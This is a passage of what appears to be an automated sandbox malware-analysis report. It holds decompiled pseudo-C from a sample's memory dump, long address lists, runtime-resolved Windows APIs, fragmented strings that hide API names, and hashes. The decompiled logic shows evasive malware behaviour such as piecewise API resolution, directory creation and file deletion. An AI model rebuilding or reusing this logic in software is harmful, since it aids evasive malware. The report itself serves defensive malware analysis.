						_t598 =  *0xfae014 & 0x0000ffff;
						 *0xfae1d0 = _t744 * _t598;
						_t879 = _t879 + 1;
						_v20 =  *0xfae044 -  *0xfa8508;
						asm("fcomp qword [ebp-0x10]");
						asm("fnstsw ax");
						 *0xfae138 =  *0xfae138 - st1;
						if((_t598 & 0x00000001) == 0) {
							_t868 =  *0xfae0b8; // 0xf45e
							_t1360 =  *0xfae120 -  *0xfa84f8;
							_v8 = _t868;
							_v20 = _t1360;
							asm("fild dword [ebp-0x4]");
							asm("fsubr qword [ebp-0x10]");
							_v20 = _t1360;
							 *0xfae3b0 =  *0xfae3b0 + _v20;
							 *0xfae0b8 =  *0xfae0b8 + 1;
						}
						_t746 =  *0xfae508; // 0x0
						_t866 =  *0xfae1ec; // 0x6050
						_t600 = _t866 - _t746;
						_t748 =  *0xfae330; // 0xb179bfc0
						_t183 = _t600 + 0x21dcb3d5; // 0xd3567395
						 *0xfae1ec = _t748 + _t183;
						 *0xfae508 =  *0xfae508 + 1;
						 *0xfae330 =  *0xfae330 + _t623;
						 *0xfae488 = 0xce2d521a;
						 *0xfae0b0 =  *0xfae134 -  *0xfa84f0;
						 *0xfae1d0 =  *0xfae1d0 + 0x2f751c99;
						_v20 =  *0xfae07c;
						_t601 =  *0xfae264; // 0x353dd48b
						_v8 = _t601;
						_v20 =  *0xfae428 + _v20;
						asm("fild dword [ebp-0x4]");
						 *0xfae264 = E00F7CABC();
						_t749 =  *0xfb0448; // 0xfa3935
						 *0xfae428 =  *0xfae428 + st1;
						asm("fxch st0, st1");
						_t189 = _t749 + 0x4b0; // 0xe3
					} while (_t879 !=  *_t189);
					goto L44;
				}
			}

0x00f67210
0x00f67219
0x00f6721c
0x00f67221
0x00f6722a
0x00f67237
0x00f67240
0x00f67243
0x00f67249
0x00f6724c
0x00f67250
0x00f67256
0x00f67259
0x00f6725f
0x00f67265
0x00f67269
0x00f6726f
0x00f6727f
0x00f67286
0x00f6728c
0x00f67293
0x00f6729d
0x00f672a4
0x00f672ab
0x00f672b2
0x00f672b8
0x00f672bf
0x00f672c6
0x00f672ca
0x00f672d1
0x00f672d7
0x00f672dd
0x00f672e4
0x00f672ea
0x00f672f1
0x00f672f7
0x00f672fe
0x00f67308
0x00f6730f
0x00f67315
0x00f67319
0x00f6731d
0x00f67321
0x00f67327
0x00f67333
0x00f67336
0x00f67339
0x00f67342
0x00f6734e
0x00f67351
0x00f67354
0x00f6735f
0x00f67365
0x00f6736b
0x00f67371
0x00f67374
0x00f67377
0x00f6737f
0x00f67382
0x00f67394
0x00f6739a
0x00f673a2
0x00f673ae
0x00f673ba
0x00f673ca
0x00f673d0
0x00f673d3
0x00f673d6
0x00f673e1
0x00f673ed
0x00f673ef
0x00f673f2
0x00f673f5
0x00f673f7
0x00f673f9
0x00f67405
0x00f6740b
0x00f67411
0x00f67423
0x00f67428
0x00f6742e
0x00f67432
0x00f67439
0x00f67442
0x00f6744d
0x00f67465
0x00f67471
0x00f67480
0x00f67489
0x00f6748c
0x00f6748f
0x00f6749b
0x00f6749d
0x00f674b1
0x00f674b3
0x00f674b8
0x00f674ea
0x00f674f6
0x00f674ba
0x00f674ba
0x00f674c0
0x00f674ca
0x00f674cd
0x00f674d0
0x00f674d3
0x00f674d6
0x00f674dc
0x00f674dc
0x00f674fc
0x00f67502
0x00f67507
0x00f6750f
0x00f67512
0x00f6751d
0x00f67520
0x00f67526
0x00f6752c
0x00f6753a
0x00f6753d
0x00f67540
0x00f67546
0x00f67550
0x00f6755a
0x00f6759c
0x00f675a5
0x00f675a8
0x00f675b6
0x00f675bf
0x00f675cd
0x00f675cd
0x00f6755c
0x00f67562
0x00f67564
0x00f6756c
0x00f67572
0x00f67578
0x00f6757b
0x00f6757e
0x00f67589
0x00f67589
0x00f675d9
0x00f675e9
0x00f675ec
0x00f675f2
0x00f675f5
0x00f675f8
0x00f67600
0x00f67606
0x00f6761b
0x00f6762d
0x00f67630
0x00f67637
0x00f67645
0x00f67666
0x00f67670
0x00f6767f
0x00f67685
0x00f67647
0x00f67647
0x00f6764e
0x00f6765e
0x00f6765e
0x00f6768c
0x00f67691
0x00f67694
0x00f67697
0x00f676a6
0x00f676a9
0x00f676ae
0x00f676b4
0x00f676b8
0x00f676c6
0x00f676cb
0x00f676d0
0x00f676d3
0x00f676d6
0x00f676de
0x00f676e4
0x00f676f0
0x00f676f4
0x00f676f6
0x00f676fc
0x00f67712
0x00f67718
0x00f6771e
0x00f67724
0x00f6772a
0x00f67730
0x00f67732
0x00f67734
0x00f6773a
0x00f67744
0x00f67747
0x00f6774a
0x00f67759
0x00f6775c
0x00f67761
0x00f67767
0x00f6776d
0x00f67775
0x00f67777
0x00f6777e
0x00f67783
0x00f67797
0x00f677c4
0x00f677d3
0x00f677d6
0x00f677d9
0x00f677df
0x00f677e4
0x00f67799
0x00f67799
0x00f677a0
0x00f677ab
0x00f677b0
0x00f677b6
0x00f677b6
0x00f677f6
0x00f67808
0x00f6780a
0x00f67816
0x00f6781a
0x00f6781c
0x00f67828
0x00f6782c
0x00f6782e
0x00f67830
0x00f6783c
0x00f67848
0x00f67854
0x00f67857
0x00f6785a
0x00f6785d
0x00f67860
0x00f67862
0x00f67867
0x00f678d0
0x00f678d8
0x00f678e1
0x00f678e4
0x00f67869
0x00f6786f
0x00f67871
0x00f67881
0x00f67893
0x00f6789c
0x00f678a2
0x00f678a5
0x00f678aa
0x00f678ac
0x00f678b6
0x00f678b9
0x00f678bc
0x00f678c5
0x00f678c8
0x00f678c8
0x00f678aa
0x00f678ea
0x00f678f4
0x00f678f7
0x00f678fa
0x00f6790f
0x00f67917
0x00f6791d
0x00f67923
0x00f6792d
0x00f67980
0x00f67987
0x00f6798d
0x00f67997
0x00f6799a
0x00f679a0
0x00f679a3
0x00f679a6
0x00f679a9
0x00f679ac
0x00f679b7
0x00f679bd
0x00f679c4
0x00f679ca
0x00f6792f
0x00f6792f
0x00f67935
0x00f6793b
0x00f6793e
0x00f67941
0x00f67944
0x00f67947
0x00f67950
0x00f67958
0x00f67964
0x00f67966
0x00f6796c
0x00f67972
0x00f67972
0x00f679d0
0x00f679d6
0x00f679dd
0x00f679e2
0x00f67a0c
0x00f67a0e
0x00f67a18
0x00f67a1b
0x00f67a1e
0x00f67a1e
0x00f67a24
0x00f67a2a
0x00f67a36
0x00f67a39
0x00f67a41
0x00f67a43
0x00f67a49
0x00f67a4f
0x00f67a55
0x00f67a60
0x00f67a66
0x00f67a6c
0x00f67a76
0x00f67a78
0x00f67a84
0x00f67a89
0x00f67aa0
0x00f67aa6
0x00f67ac4
0x00f67ac6
0x00f67acc
0x00f67ad2
0x00f67ad5
0x00f67ad8
0x00f67ad8
0x00f67ade
0x00f67ae4
0x00f67ae9
0x00f67aec
0x00f67aef
0x00f67af2
0x00f67afe
0x00f67b01
0x00f67b0d
0x00f67b0f
0x00f67b11
0x00f67b13
0x00f67b15
0x00f67b1b
0x00f67b21
0x00f67b2b
0x00f67b2e
0x00f67b38
0x00f67b3b
0x00f67b44
0x00f67b4d
0x00f67b56
0x00f67b5b
0x00f67b61
0x00f67b64
0x00f67b67
0x00f67b6a
0x00f67b70
0x00f67b72
0x00f67b7a
0x00f67b7c
0x00f67b7e
0x00f67b80
0x00f67b86
0x00f67b90
0x00f67bb7
0x00f67b92
0x00f67b98
0x00f67ba3
0x00f67ba9
0x00f67baf
0x00f67baf
0x00f67bb9
0x00f67bc9
0x00f67bd3
0x00f67bd9
0x00f67bdf
0x00f67bdf
0x00f67be5
0x00f67bf0
0x00f67bf3
0x00f67bfe
0x00f67c04
0x00f67c0a
0x00f67c0f
0x00f67c19
0x00f67c1c
0x00f67c22
0x00f67c2b
0x00f67c33
0x00f67c3e
0x00f67c42
0x00f67c44
0x00f67c4a
0x00f67c56
0x00f67c5f
0x00f67c65
0x00f67c6b
0x00f67c6e
0x00f67c74
0x00f67c7a
0x00f67c7d
0x00f67c80
0x00f67c89
0x00f67c91
0x00f67c9c
0x00f67c9e
0x00f67ca0
0x00f67ca2
0x00f67ca4
0x00f67caa
0x00f67cb4
0x00f67cb7
0x00f67cba
0x00f67cc9
0x00f67cd1
0x00f67cdf
0x00f67ceb
0x00f67cf7
0x00f67d05
0x00f67d17
0x00f67d1d
0x00f67d24
0x00f67d2a
0x00f67d3b
0x00f67d49
0x00f67d49
0x00f67d55
0x00f67d5e
0x00f67d66
0x00f67d69
0x00f67d6c
0x00f67d77
0x00f67d82
0x00f67d8a
0x00f67d96
0x00f681c0
0x00f681c0
0x00f681c6
0x00f681cd
0x00f681d3
0x00f681d8
0x00f681db
0x00f681de
0x00f681e1
0x00f681e7
0x00f681f6
0x00f68202
0x00f6821a
0x00f6821c
0x00f68221
0x00f68223
0x00f68234
0x00f6823a
0x00f6823a
0x00f68252
0x00f68264
0x00f6826a
0x00f68276
0x00f68279
0x00f6827c
0x00f6827f
0x00f68282
0x00f68284
0x00f68289
0x00f68291
0x00f68297
0x00f682a0
0x00f682a3
0x00f682a6
0x00f682a9
0x00f682b1
0x00f682b1
0x00f682b7
0x00f682c4
0x00f682cd
0x00f682d5
0x00f682dc
0x00f682e6
0x00f682f0
0x00f682f9
0x00f682fc
0x00f682ff
0x00f68301
0x00f68307
0x00f6830d
0x00f68313
0x00f6831f
0x00f68322
0x00f68325
0x00f68327
0x00f68337
0x00f6833a
0x00f6833d
0x00f68346
0x00f68349
0x00f6834f
0x00f68355
0x00f68358
0x00f6835b
0x00f6836a
0x00f68372
0x00f68377
0x00f6837d
0x00f68380
0x00f68383
0x00f68394
0x00f683a1
0x00f683b3
0x00f683bf
0x00f683cd
0x00f683d7
0x00f683d7
0x00f683dd
0x00f683ec
0x00f683ee
0x00f683f4
0x00f683fe
0x00f68407
0x00f6840a
0x00f6840d
0x00f68419
0x00f6841c
0x00f6841c
0x00f68422
0x00f6842f
0x00f68438
0x00f6843f
0x00f68442
0x00f68449
0x00f6844f
0x00f68452
0x00f68458
0x00f68460
0x00f68463
0x00f68466
0x00f68469
0x00f6846c
0x00f6846f
0x00f68472
0x00f68475
0x00f6847a
0x00f68492
0x00f68498
0x00f684a2
0x00f684a9
0x00f684b3
0x00f684b9
0x00f6847c
0x00f68489
0x00f68489
0x00f684c0
0x00f684c6
0x00f684cd
0x00f684d6
0x00f684e5
0x00f684ec
0x00f684f4
0x00f68507
0x00f68524
0x00f68535
0x00f68537
0x00f68551
0x00f6855f
0x00f68568
0x00f6857a
0x00f6858f
0x00f685a1
0x00f685b2
0x00f685b8
0x00f685c8
0x00f685ca
0x00f685cd
0x00f685d0
0x00f685dc
0x00f685e2
0x00f685e9
0x00f685ef
0x00f685f5
0x00f685fa
0x00f68682
0x00f6868c
0x00f6868f
0x00f68692
0x00f686a4
0x00f686a6
0x00f68600
0x00f68600
0x00f68606
0x00f68609
0x00f6860c
0x00f68615
0x00f6861b
0x00f68621
0x00f68624
0x00f68629
0x00f68651
0x00f68653
0x00f68659
0x00f6865e
0x00f68661
0x00f68664
0x00f68673
0x00f6867b
0x00f6862b
0x00f6862b
0x00f68637
0x00f6863a
0x00f6863d
0x00f68643
0x00f68643
0x00f68629
0x00f686b4
0x00f686cc
0x00f686de
0x00f686f5
0x00f68700
0x00f68702
0x00f68708
0x00f68712
0x00f6871c
0x00f68721
0x00f6872e
0x00f68734
0x00f6873a
0x00f68740
0x00f68747
0x00f6874e
0x00f68754
0x00f68757
0x00f6875f
0x00f68762
0x00f68765
0x00f68768
0x00f6876b
0x00f6876e
0x00f68777
0x00f68780
0x00f68783
0x00f68788
0x00f687a6
0x00f687b2
0x00f687b7
0x00f687bd
0x00f687c0
0x00f687c3
0x00f687c9
0x00f687d5
0x00f6878a
0x00f68796
0x00f68796
0x00f687db
0x00f687e1
0x00f687e3
0x00f687e5
0x00f687eb
0x00f687f1
0x00f687fe
0x00f68804
0x00f68807
0x00f6880a
0x00f68810
0x00f68819
0x00f6881c
0x00f68822
0x00f68828
0x00f6882b
0x00f6882e
0x00f6883d
0x00f68845
0x00f68850
0x00f68856
0x00f6885c
0x00f68866
0x00f68869
0x00f6886c
0x00f68875
0x00f6887e
0x00f68880
0x00f68882
0x00f68888
0x00f68891
0x00f688d1
0x00f688db
0x00f688e1
0x00f68893
0x00f68893
0x00f6889a
0x00f688aa
0x00f688ad
0x00f688b0
0x00f688bc
0x00f688c2
0x00f688c9
0x00f688c9
0x00f688ea
0x00f688fc
0x00f68908
0x00f6890e
0x00f68910
0x00f683d5
0x00000000
0x00f683d5
0x00f68923
0x00f68935
0x00f68947
0x00f6895f
0x00f6896b
0x00f68979
0x00f6898b
0x00f68991
0x00f68996
0x00f6899c
0x00f689a2
0x00f689b5
0x00f689b7
0x00f689be
0x00f689ce
0x00f689ce
0x00f689d8
0x00f689e5
0x00f689eb
0x00f689f1
0x00f689f6
0x00f689fc
0x00f68a03
0x00f68a06
0x00f68a09
0x00f68a12
0x00f68a18
0x00f68a1e
0x00f68a21
0x00f68a26
0x00f68a28
0x00f68a32
0x00f68a35
0x00f68a38
0x00f68a44
0x00f68a50
0x00f68a52
0x00f68a58
0x00f68a58
0x00f68a6b
0x00f68a72
0x00f68a77
0x00f68a7d
0x00f68a84
0x00f68a8a
0x00f68a90
0x00f68a96
0x00f68aa2
0x00f68ab1
0x00f68aba
0x00f68abd
0x00f68ac0
0x00f68aca
0x00f68ad3
0x00f68af9
0x00f68ad5
0x00f68ae0
0x00f68ae0
0x00f68b06
0x00f68b14
0x00f68b1a
0x00f68b20
0x00f68b3b
0x00f68b42
0x00f68b55
0x00f68b68
0x00f68b71
0x00f68b77
0x00f68b7a
0x00f68b7d
0x00f68b83
0x00f68b88
0x00f68b8b
0x00f68b97
0x00f68b9e
0x00f68bb2
0x00f68bb2
0x00f68bb9
0x00f68bca
0x00f68bdb
0x00f68bed
0x00f68c05
0x00f68c11
0x00f68c13
0x00f68c1b
0x00f68c1f
0x00f68c21
0x00f68c23
0x00f68c2c
0x00f68c2e
0x00f68c3a
0x00f68c3a
0x00f68c52
0x00f68c54
0x00f68c60
0x00f68c6c
0x00f68c72
0x00f68c7f
0x00f68c83
0x00f68c85
0x00f68c91
0x00f68c9a
0x00f68ca1
0x00f68ca4
0x00f68cad
0x00f68cb3
0x00f68cb6
0x00f68cb9
0x00f68cbf
0x00f68cc2
0x00f68cc8
0x00f68ccb
0x00f68cce
0x00f68cd1
0x00f68cd7
0x00f68cdd
0x00f68ce0
0x00f68ce3
0x00f68ce6
0x00f68ce9
0x00f68cec
0x00f68cef
0x00f68cf2
0x00f68cf5
0x00f68cf7
0x00f68cfc
0x00f68d04
0x00f68d0d
0x00f68d12
0x00f68d15
0x00f68d18
0x00f68d1b
0x00f68d1e
0x00f68d21
0x00f68d26
0x00f68d26
0x00f68d2f
0x00f68d2f
0x00f68d35
0x00f68d38
0x00f68d3b
0x00f68d53
0x00f68d55
0x00f68d5f
0x00f68d6b
0x00f68d6d
0x00f68d73
0x00f68d7c
0x00f68d8a
0x00f68d90
0x00f68d92
0x00f68d97
0x00f68d99
0x00f68d9f
0x00f68da9
0x00f68db1
0x00f68db4
0x00f68db7
0x00f68dba
0x00f68dc0
0x00f68dc0
0x00f68d97
0x00f68dda
0x00f68de1
0x00f68de8
0x00f68def
0x00f68e00
0x00f68e00
0x00f68e07
0x00f68e0a
0x00f68e0d
0x00f68e16
0x00f68e1d
0x00f68e20
0x00f68e22
0x00f68e27
0x00f68e3e
0x00f68e4a
0x00f68e56
0x00f68e5f
0x00f68e67
0x00f68e6d
0x00f68e73
0x00f68e78
0x00f68e7d
0x00f68e80
0x00f68e83
0x00f68e86
0x00f68e90
0x00f68e9c
0x00f68e9e
0x00f68ea7
0x00f68eaf
0x00f68eb5
0x00f68eb5
0x00f68e29
0x00f68e29
0x00f68e33
0x00f68e33
0x00f68ec6
0x00000000
0x00000000
0x00f68ecc
0x00f68ed6
0x00f68edd
0x00f68ee6
0x00f68eed
0x00f68ef0
0x00f68ef3
0x00f68f02
0x00f68f05
0x00f68f0f
0x00f68f18
0x00f68f50
0x00f68f68
0x00f68f1a
0x00f68f20
0x00f68f2f
0x00f68f32
0x00f68f40
0x00f68f40
0x00f68f74
0x00f68f83
0x00f68f86
0x00f68f89
0x00f68f8c
0x00f68f8f
0x00f68f97
0x00f68f99
0x00f68fa2
0x00f68ffa
0x00f68ffc
0x00f68fa4
0x00f68fb0
0x00f68fbc
0x00f68fc8
0x00f68fd4
0x00f68fd6
0x00f68fe4
0x00f68fe6
0x00f68fec
0x00f68ff2
0x00f68ff2
0x00f68ffe
0x00f69004
0x00f69007
0x00f6900c
0x00f69015
0x00f69018
0x00f6901e
0x00f69024
0x00f6902a
0x00f69030
0x00f69037
0x00f6903e
0x00f69045
0x00f6904b
0x00f69050
0x00f69053
0x00f69056
0x00f6905f
0x00f69068
0x00f6907d
0x00f69080
0x00f69088
0x00f6908c
0x00f6908e
0x00f69097
0x00f6909f
0x00f690a4
0x00f690a4
0x00f690b0
0x00f690b6
0x00f690bc
0x00f68d2d
0x00f68d2d
0x00f690c3
0x00f690c9
0x00f690cc
0x00f690cf
0x00f690db
0x00f690e7
0x00f690f1
0x00f690f4
0x00f690f7
0x00f690f9
0x00f690fe
0x00f69103
0x00f69110
0x00f69112
0x00f69118
0x00f69122
0x00f69125
0x00f69128
0x00f69134
0x00f69142
0x00f6914e
0x00f6915d
0x00f69160
0x00f69162
0x00f6916a
0x00f6916c
0x00f69175
0x00f69177
0x00f69181
0x00f69184
0x00f69187
0x00f69193
0x00f69199
0x00f69199
0x00f691a5
0x00f691b4
0x00f691c0
0x00f691cc
0x00f691ce
0x00f691e2
0x00f691f5
0x00f69207
0x00f6920d
0x00f69213
0x00f69220
0x00f6922c
0x00f69233
0x00f69241
0x00f69241
0x00f69253
0x00f6925f
0x00f69274
0x00f69277
0x00f69281
0x00f6928d
0x00f6928f
0x00f69298
0x00f6929a
0x00f6929f
0x00f692a2
0x00f692a5
0x00f692b6
0x00f692c3
0x00f692c3
0x00f692d5
0x00f692e1
0x00f692e8
0x00f692f1
0x00f692fa
0x00f692fd
0x00f69303
0x00f69308
0x00f69308
0x00f6930b
0x00f69317
0x00f69319
0x00f6931f
0x00f68bb0
0x00000000
0x00f69325
0x00f6932d
0x00f69339
0x00f69344
0x00f69347
0x00f6934a
0x00f6934d
0x00f69350
0x00f69355
0x00f69357
0x00f6935d
0x00f69365
0x00f69365
0x00f69377
0x00f69385
0x00f69397
0x00f6939d
0x00f6939f
0x00f693b1
0x00f693b7
0x00f693ce
0x00f693d4
0x00f693e4
0x00f693ea
0x00f693f6
0x00f69402
0x00f69408
0x00f6940e
0x00f69414
0x00f6941c
0x00f69429
0x00f6942f
0x00f69439
0x00f69440
0x00f69451
0x00f69454
0x00f69457
0x00f69460
0x00f69463
0x00f6946f
0x00f69475
0x00f6947b
0x00f69487
0x00f6948a
0x00f6948d
0x00f6948f
0x00f6949f
0x00f694a2
0x00f694a5
0x00f694b4
0x00f694bc
0x00f694c2
0x00f694c8
0x00f694c9
0x00f694c9
0x00f6931f
0x00f67d9c
0x00f67d9c
0x00f67d9c
0x00f67da2
0x00f67da4
0x00f67da6
0x00f67dac
0x00f67db6
0x00f67db9
0x00f67dbc
0x00f67dce
0x00f67dd0
0x00f67dd6
0x00f67ddc
0x00f67de2
0x00f67deb
0x00f67dee
0x00f67df1
0x00f67df4
0x00f67dfa
0x00f67e00
0x00f67e0c
0x00f67e0f
0x00f67e12
0x00f67e1b
0x00f67e21
0x00f67e27
0x00f67e31
0x00f67e34
0x00f67e37
0x00f67e3d
0x00f67e40
0x00f67e42
0x00f67e48
0x00f67e51
0x00f67e53
0x00f67e5a
0x00f67e6e
0x00f67e70
0x00f67e7c
0x00f67e7c
0x00f67e6e
0x00f67e82
0x00f67e99
0x00f67ea4
0x00f67eab
0x00f67eba
0x00f67ebd
0x00f67ec0
0x00f67ec3
0x00f67ed0
0x00f67ed6
0x00f67ed9
0x00f67edc
0x00f67ee2
0x00f67ee7
0x00f67eed
0x00f67ef7
0x00f67efa
0x00f67efd
0x00f67f06
0x00f67f09
0x00f67f0b
0x00f67f10
0x00f67f18
0x00f67f1e
0x00f67f1e
0x00f67f32
0x00f67f45
0x00f67f4c
0x00f67f58
0x00f67f5c
0x00f67f5f
0x00f67f6b
0x00f67f71
0x00f67f85
0x00f67f8c
0x00f67f92
0x00f67f98
0x00f67fa3
0x00f67faa
0x00f67fb6
0x00f67fbf
0x00f67fc2
0x00f67fca
0x00f67fce
0x00f67fd0
0x00f67fd2
0x00f67fdb
0x00f68042
0x00f67fdd
0x00f67fe3
0x00f67fe7
0x00f67fe9
0x00f67fef
0x00f67ff5
0x00f67ffc
0x00f67fff
0x00f68002
0x00f68005
0x00f68008
0x00f68011
0x00f6801a
0x00f6801d
0x00f68022
0x00f68024
0x00f68039
0x00f68039
0x00f68022
0x00f68044
0x00f68058
0x00f6805f
0x00f68074
0x00f68079
0x00f6807f
0x00f68085
0x00f68092
0x00f68098
0x00f6809e
0x00f680a4
0x00f680b2
0x00f680c1
0x00f680c4
0x00f680ce
0x00f680d7
0x00f680df
0x00f680e6
0x00f680ef
0x00f680f2
0x00f680f5
0x00f680f8
0x00f680fb
0x00f68107
0x00f6810d
0x00f6810d
0x00f68114
0x00f6811b
0x00f68128
0x00f6812a
0x00f68130
0x00f68137
0x00f6813e
0x00f68145
0x00f6814b
0x00f68161
0x00f68167
0x00f68177
0x00f68180
0x00f68188
0x00f6818b
0x00f6818e
0x00f68199
0x00f681a4
0x00f681ac
0x00f681b2
0x00f681b4
0x00f681b4
0x00000000
0x00f67d9c

APIs

GetModuleHandleA.KERNEL32(Kern), ref: 00F6740B
GetProcAddress.KERNEL32(74CA0000,Creat), ref: 00F67439
GetProcAddress.KERNEL32(74CA0000,CreateThread), ref: 00F67507
GetProcAddress.KERNEL32(74CA0000,SetEve), ref: 00F676BE
GetProcAddress.KERNEL32(74CA0000,WaitForSingleObj), ref: 00F67775
GetProcAddress.KERNEL32(74CA0000,CloseHandSetEve), ref: 00F679DB
GetProcAddress.KERNEL32(74CA0000,00006C53), ref: 00F67A76
_memset.LIBCMT ref: 00F67C0A
CreateThread.KERNELBASE ref: 00F67F32
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00F67F8C

Strings

'9|', xrefs: 00F693B7, 00F693CE
Sl, xrefs: 00F672D7
l, xrefs: 00F672F1
Kern, xrefs: 00F673EF, 00F673F4
2.dl, xrefs: 00F6729D
t, xrefs: 00F67250
ct, xrefs: 00F6725F
Y/|, xrefs: 00F67E69
SetEve, xrefs: 00F676B4, 00F676B7
WaitForSingleObj, xrefs: 00F6776D, 00F67773
CloseHandSetEve, xrefs: 00F679D6, 00F679D9
eE, xrefs: 00F672E4
eep, xrefs: 00F672CA
CreateThread, xrefs: 00F67502, 00F67505
l3, xrefs: 00F672B2
n, xrefs: 00F67265
d#LP, xrefs: 00F683CD
A, xrefs: 00F6730F
vent, xrefs: 00F672AB
Creat, xrefs: 00F6742E, 00F67431

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: AddressProc$ChangeCloseCreateFindHandleModuleNotificationThread_memset
String ID: '9|'$2.dl$A$CloseHandSetEve$Creat$CreateThread$Kern$SetEve$Sl$WaitForSingleObj$Y/|$ct$d#LP$eE$eep$l$l3$n$t$vent
API String ID: 3301306101-685866635
Opcode ID: 775972d8e675cadd50fe895ee164fc300a21e2ad0d0bca6c0da4e43c335be73d
Instruction ID: 685ba509efc4f78541932f0f3cd5d57298617392f7ada18aa6019b1fb2df504b
Opcode Fuzzy Hash: 775972d8e675cadd50fe895ee164fc300a21e2ad0d0bca6c0da4e43c335be73d
Instruction Fuzzy Hash: 6B138CF4D0061DDBEB04DFA0FD981A97FB4FB8A310B52845AC480A22B8EB7505B5FB55

Uniqueness

Uniqueness Score: -1.00%

Function 00F652E0 Relevance: 30.4, APIs: 15, Strings: 2, Instructions: 631
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00F652E0(signed int __fp0) {
				signed int _v12;
				intOrPtr _v16;
				long long _v20;
				char _v24;
				long long _v28;
				char _v56;
				char _v313;
				char _v316;
				void* __edi;
				void* __esi;
				signed int _t121;
				intOrPtr _t125;
				void* _t133;
				void* _t135;
				unsigned int _t136;
				void* _t141;
				signed char _t142;
				void* _t145;
				unsigned int _t146;
				void* _t154;
				void* _t156;
				intOrPtr _t165;
				void* _t167;
				unsigned int _t168;
				void* _t173;
				void* _t177;
				unsigned int _t178;
				void* _t187;
				intOrPtr* _t189;
				void* _t192;
				void* _t193;
				void* _t197;
				unsigned int _t198;
				void* _t210;
				void* _t212;
				void* _t214;
				short _t217;
				short _t225;
				void* _t227;
				intOrPtr _t228;
				void* _t229;
				unsigned int _t230;
				void* _t235;
				short _t238;
				void* _t240;
				void* _t241;
				void* _t242;
				void _t243;
				void _t244;
				void _t249;
				void _t250;
				signed int _t252;
				char _t257;
				intOrPtr _t258;
				void* _t262;
				void _t263;
				signed int _t265;
				int _t268;
				signed int _t272;
				signed int _t275;
				void _t276;
				void _t277;
				signed int _t279;
				char _t284;
				intOrPtr _t285;
				void* _t287;
				void _t288;
				signed int _t290;
				int _t293;
				intOrPtr _t299;
				char _t300;
				void _t301;
				void _t302;
				signed int _t304;
				int _t307;
				intOrPtr _t309;
				char _t314;
				void* _t315;
				void _t317;
				signed int _t319;
				int _t322;
				void* _t329;
				void _t330;
				signed int _t332;
				void* _t337;
				void _t339;
				signed int _t341;
				void* _t347;
				void _t351;
				intOrPtr _t354;
				void* _t358;
				void _t360;
				void* _t362;
				void* _t366;
				signed int _t367;
				short _t368;
				void _t370;
				void* _t372;
				signed int _t373;
				void* _t375;
				void* _t381;
				void* _t385;
				void* _t387;
				void* _t393;
				void* _t398;
				void* _t403;
				void* _t408;
				void* _t414;
				void* _t420;
				void* _t421;
				void* _t424;
				void* _t425;
				void* _t427;
				void* _t429;
				void* _t430;
				void* _t431;
				void* _t432;
				void* _t435;
				void* _t436;
				void* _t438;
				void* _t440;
				void* _t445;
				void* _t448;
				void* _t450;
				void* _t452;
				void* _t458;
				void* _t463;
				void* _t466;
				void* _t469;
				void* _t472;
				int _t519;
				signed int _t520;
				long long _t522;
				signed int _t525;
				signed long long _t527;

				_t520 = __fp0;
				_t121 =  *0xfae264; // 0x353dd48b
				 *0xfae264 = _t121 * 0x3502a1b;
				E00F69630( &_v56);
				_t239 = 0;
				_v24 = 0;
				0xfb0768->dwOSVersionInfoSize = 0x94;
				GetVersionExA(0xfb0768); // executed
				_t125 = E00F71CA0(); // executed
				 *0xfb0744 = _t125;
				 *0xfb04ec = E00F666A0(_t520);
				_t472 =  *0xfb0744 - _t239; // 0x1
				if(_t472 == 0) {
					_v316 = 0;
				} else {
					_t227 = E00F79CC0( &_v316);
					_v12 =  *0xfae540;
					 *((char*)(_t431 + _t227 - 0x138)) = 0x5c;
					_t466 = _t432 + 4;
					_t228 = _t227 + 1;
					 *((char*)(_t431 + _t228 - 0x138)) = 0;
					_v16 = _t228;
					asm("fsubr qword [ebp-0x8]");
					 *0xfae540 =  *0xfae198 -  *0xfa7fa0;
					_t229 =  *0xfafc74; // 0x27311b0
					_t552 =  *0xfae198 +  *0xfa75c8;
					_t329 = _t229;
					 *0xfae198 =  *0xfae198 +  *0xfa75c8;
					do {
						_t370 =  *_t229;
						_t229 = _t229 + 1;
					} while (_t370 != 0);
					_t230 = _t229 - _t329;
					_t429 = _t329;
					_t408 =  &_v316 - 1;
					do {
						_t330 =  *(_t408 + 1);
						_t408 = _t408 + 1;
					} while (_t330 != 0);
					_t332 = _t230 >> 2;
					memcpy(_t429 + _t332 + _t332, _t429, memcpy(_t408, _t429, _t332 << 2) & 0x00000003);
					CreateDirectoryA( &_v316, 0); // executed
					_t337 = E00F6CF90(memcpy(_t408, _t429, _t332 << 2) & 0x00000003, _t552, 0x22b4, 0x1f);
					_t469 = _t466 + 0x20;
					_t372 = _t337;
					do {
						_t244 =  *_t337;
						_t337 = _t337 + 1;
					} while (_t244 != 0);
					_t430 = _t372;
					_t373 = _t337 - _t372;
					_t414 =  &_v316 - 1;
					do {
						_t339 =  *(_t414 + 1);
						_t414 = _t414 + 1;
						_t480 = _t339;
					} while (_t339 != 0);
					_t341 = _t373 >> 2;
					_t235 = memcpy(_t414, _t430, _t341 << 2);
					memcpy(_t430 + _t341 + _t341, _t430, _t373 & 0x00000003);
					E00F76570(0x1f, _t235);
					_t432 = _t469 + 0x20;
					_v12 =  *0xfae050;
					_t520 =  *0xfae578 + _v12 -  *0xfa7f98;
					_t238 = E00F7CABC();
					_t239 = _v24;
					 *0xfae048 = _t238;
				}
				E00F78260( &_v56, _t520, E00F6CF90(_t480, _t520, 0x1e44, 0x1f));
				E00F76570(0x1f, _t127);
				_t133 = E00F6A9D0(E00F71FC0(E00F6CEE0( &_v316),  &_v56), _t131,  &_v316, 0x181dd011); // executed
				_t435 = _t432 + 0x20;
				if(_t133 != 0) {
					_t239 = 1; // executed
					DeleteFileA( &_v316); // executed
					 *0xfae1b8 =  *0xfae1b8 -  *0xfae5a0;
